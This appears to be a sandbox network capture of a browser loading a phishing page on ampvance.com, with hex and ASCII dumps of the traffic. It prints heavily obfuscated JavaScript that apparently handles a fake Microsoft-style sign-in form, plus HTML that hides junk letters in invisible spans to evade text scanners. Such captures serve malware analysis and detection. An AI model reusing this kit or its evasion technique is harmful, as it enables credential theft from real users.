                                                      2024-03-05 13:23:43 UTC704INData Raw: 31 62 38 33 0d 0a 76 61 72 20 5f 30 78 32 32 64 35 62 34 3d 5f 30 78 65 39 33 36 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 7b 76 61 72 20 5f 30 78 35 61 66 63 32 39 3d 5f 30 78 32 65 38 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 65 39 33 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 38 30 33 34 2c 5f 30 78 31 36 34 39 61 66 29 7b 5f 30 78 35 65 38 30 33 34 3d 5f 30 78 35 65 38 30 33 34 2d 30 78 31 32 64 3b 76 61 72 20 5f 30 78 34 31 62 66 65 38 3d 5f 30 78 35 61 66 63 32 39 5b 5f 30 78 35 65 38 30 33 34 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 31 62 66 65 38 3b 7d 2c 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: 1b83var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 32 65 38 39 2c 30 78 36 32 62 30 31 29 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 65 38 39 28 29 7b 76 61 72 20 5f 30 78 33 35 37 34 33 62 3d 5b 27 6c 6f 67 27 2c 27 75 6e 64 65 72 27 2c 27 70 72 6f 74 6f 74 79 70 65 27 2c 27 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 73 65 61 72 63 68 27 2c 27 70 72 6f 67 72 65 73 73 42 61 72 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 3c 62 72 2f 3e 27 2c 27 65 61 63 68 27 2c 27 6a 73 6f 6e 27 2c 27 74 72 61 63 65 27 2c 27 73 74 79 6c 65 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 2c 27 6f 70 61 63 69 74 79 27 2c 27 6e 6f 6e 65 27 2c 27 69 30 31 31 36 27 2c 27 76 61 6c 75 65 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 72 65 6d 6f 76 65 41 74 74 72 27 2c 27 72 65 73 65
                                                      Data Ascii: 2e89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','rese
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 32 64 61 66 29 7b 76 61 72 20 5f 30 78 33 39 30 31 65 35 3d 5f 30 78 31 31 32 64 61 66 5b 5f 30 78 31 32 66 34 64 38 28 30 78 31 35 38 29 5d 28 5f 30 78 32 38 31 64 34 34 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 32 64 61 66 3d 6e 75 6c 6c 2c 5f 30 78 33 39 30 31 65 35 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 38 37 64 62 3d 21 5b 5d 2c 5f 30 78 33 63 66 65 63 39 3b 7d 3b 7d 28 29 29 2c 5f 30 78 34 62 39 62 61 35 3d 5f 30 78 64 62 31 63 65 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 38 38 32 35 33 3d 5f 30 78 65 39 33 36 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 39 62 61 35 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 31 29 5d 28 29 5b 5f 30 78 34 38
                                                      Data Ascii: 2daf){var _0x3901e5=_0x112daf[_0x12f4d8(0x158)](_0x281d44,arguments);return _0x112daf=null,_0x3901e5;}}:function(){};return _0x2b87db=![],_0x3cfec9;};}()),_0x4b9ba5=_0xdb1cec(this,function(){var _0x488253=_0xe936;return _0x4b9ba5[_0x488253(0x131)]()[_0x48
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 78 33 61 65 62 32 61 3b 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 38 29 5d 3d 5f 30 78 31 36 34 39 61 66 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 31 36 34 39 61 66 29 2c 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 3d 5f 30 78 34 31 65 35 39 30 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 34 31 65 35 39 30 29 2c 5f 30 78 35 31 36 64 37 64 5b 5f 30 78 31 63 64 66 39 31 5d 3d 5f 30 78 33 61 65 62 32 61 3b 7d 7d 29 3b 5f 30 78 35 65 38 30 33 34 28 29 3b 66 75 6e 63 74 69 6f 6e 20 73 6c 65 65 70 28 5f 30 78 34 31 35 62 63 31 29 7b 76 61 72 20 5f 30 78 31 35 35 30 61 33 3d 5f 30 78 65 39 33 36 3b
                                                      Data Ascii: x3aeb2a;_0x3aeb2a[_0x3947f6(0x138)]=_0x1649af[_0x3947f6(0x15f)](_0x1649af),_0x3aeb2a[_0x3947f6(0x131)]=_0x41e590[_0x3947f6(0x131)][_0x3947f6(0x15f)](_0x41e590),_0x516d7d[_0x1cdf91]=_0x3aeb2a;}});_0x5e8034();function sleep(_0x415bc1){var _0x1550a3=_0xe936;
                                                      2024-03-05 13:23:43 UTC1369INData Raw: 78 31 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 35 32 29 29 2c 5f 30 78 34 62 39 38 35 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 33 29 29 3b 70 72 6f 67 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 37 31 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 66 29 29 2c 70 72 6f 67 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 35 29 29 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 30 29 5d 3d 27 31 30 27 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36
                                                      Data Ascii: x146)](_0x367cb5(0x152)),_0x4b985c=document[_0x367cb5(0x146)](_0x367cb5(0x133));prog=document[_0x367cb5(0x171)](_0x367cb5(0x13f)),prog[_0x367cb5(0x166)](_0x367cb5(0x165)),_0x261182[_0x367cb5(0x145)][_0x367cb5(0x130)]='10',_0x261182[_0x367cb5(0x145)][_0x36
                                                      2024-03-05 13:23:43 UTC871INData Raw: 5f 30 78 32 35 38 65 31 62 28 30 78 31 35 39 29 5d 2c 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 33 31 39 33 33 2c 5f 30 78 31 36 32 34 34 63 29 7b 76 61 72 20 5f 30 78 32 36 38 33 34 38 3d 5f 30 78 32 35 38 65 31 62 3b 5f 30 78 32 62 65 64 39 37 2b 3d 27 27 2b 5f 30 78 31 36 32 34 34 63 5b 30 78 30 5d 2b 5f 30 78 32 36 38 33 34 38 28 30 78 31 34 31 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 35 64 31 35 32 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 36 34 29 5d 3d 3d 30 78 31 61 33 29 6c 6f 63 61 74 69 6f 6e 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 35 31 29 5d 28 29 3b 65 6c 73 65 7b 7d 7d 7d 2c 27 63 6f 6d 70 6c 65 74 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 64 63 37 34 29 7b 76 61 72 20 5f 30 78 31 65 38 63 64 35 3d 5f 30 78 33 36 37 63
                                                      Data Ascii: _0x258e1b(0x159)],function(_0x131933,_0x16244c){var _0x268348=_0x258e1b;_0x2bed97+=''+_0x16244c[0x0]+_0x268348(0x141);});}else{if(_0x35d152[_0x258e1b(0x164)]==0x1a3)location[_0x258e1b(0x151)]();else{}}},'complete':function(_0x25dc74){var _0x1e8cd5=_0x367c
                                                      2024-03-05 13:23:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.449781104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1087OUTGET /1 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:44 UTC738INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:44 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      cache-control: no-store, no-cache, must-revalidate
                                                      pragma: no-cache
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xT5S%2B7VSvuaj25upx%2FUhXzy3kM8YUH5rQ8I5JVX7utf498dexQnFK824ZEcoT40rdgDLtBuMWZCMpqcw5SW8iQMr%2BBUvT%2FYoHEb8HhBNb%2BlszFIu3d3sTIgJeHjkb6Y%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1949d241e3-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:44 UTC631INData Raw: 37 32 65 65 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 64 36 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 53 69 67 6e 20 69 6e 20 74 6f 20 74 68 65 20 42 65 73 74 20 50 72 6f 64 75 63 74 69 76 69 74 79 20 50 72 6f 76 69 64 65 72 21 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65
                                                      Data Ascii: 72ee <html dir="ltr" class="048a11303f2c0b13c71de5123e30fffb65e71ce053bd6" lang="en"> <head> <title> Sign in to the Best Productivity Provider! </title> <meta http-equiv="Content-Type" content="text/html; charse
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 64 65 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 64 66 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35
                                                      Data Ascii: e5123e30fffb65e71ce053bde" rel="stylesheet"> </head> <body class="cb 048a11303f2c0b13c71de5123e30fffb65e71ce053bdf" style="display: block;"> <div> <div> <div class="background 048a11303f2c0b13c71de5123e30fffb65
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 66 62 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 6c 6f 67 5f 66 6f 72 6d 22 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 66 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 30 34 38 61 31 31 33 30 33 66 32 63 30 62 31 33 63 37 31 64 65 35 31 32 33 65 33 30 66 66 66 62 36 35 65 37 31 63 65 30 35 33 62 66 64 22 3e 20 3c 2f 64 69 76 3e 0a 20 20
                                                      Data Ascii: 30fffb65e71ce053bfb"> <div id="log_form" class="inner fade-in-lightbox 048a11303f2c0b13c71de5123e30fffb65e71ce053bfc"> <div class="lightbox-cover 048a11303f2c0b13c71de5123e30fffb65e71ce053bfd"> </div>
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 69 61 2d 6c 65 76 65 6c 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 44 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20
                                                      Data Ascii: ia-level="1"> S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">D</span>i<span style="display: inline; color: rgba(26, 125, 117,
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 61 6c 65 72 74 22 20 61 72 69 61 2d 6c 69 76 65 3d 22 61 73 73 65 72 74 69 76 65 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 32 34 20 65 72 72 6f 72 20 65 78 74 2d 65 72 72 6f 72 22 20 69 64 3d 22 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: <div role="alert" aria-live="assertive"> </div> <div hidden="" class="col-md-24 error ext-error" id="usernameError">
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 6c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20
                                                      Data Ascii: ax-height: 0.03px; font-size: 0.02px;">k</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>l<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px;
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 64 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62
                                                      Data Ascii: (26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>d<span style="display: inline; color: rgb
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 6e 3c
                                                      Data Ascii: pan style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>n<
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 2c 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a
                                                      Data Ascii: 0.03px; font-size: 0.02px;">k</span>,<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height:
                                                      2024-03-05 13:23:44 UTC1369INData Raw: 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 6e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 6b 3c 2f 73 70 61 6e 3e 61 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20
                                                      Data Ascii: 17, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">k</span>a<span style="display: inline; color: rgba(26, 125,


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.449782104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1161OUTGET /favicon.ico HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:44 UTC692INHTTP/1.1 404 Not Found
                                                      Date: Tue, 05 Mar 2024 13:23:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: BYPASS
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XcF14UCAAyTf%2FjfNnuotUBkWSG%2B0hS%2B0aHxRgF3uo2MTLKPyJM236qXjr41SGJ%2BdJWwkmy0%2FKOU8aGEu7DEa6e%2FG%2B%2FRiHTRBQWbvIN0fVGiU12W1Qr54c8scRfUgr04%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c197e3f0f7f-EWR
                                                      alt-svc: h3=":443"; ma=86400
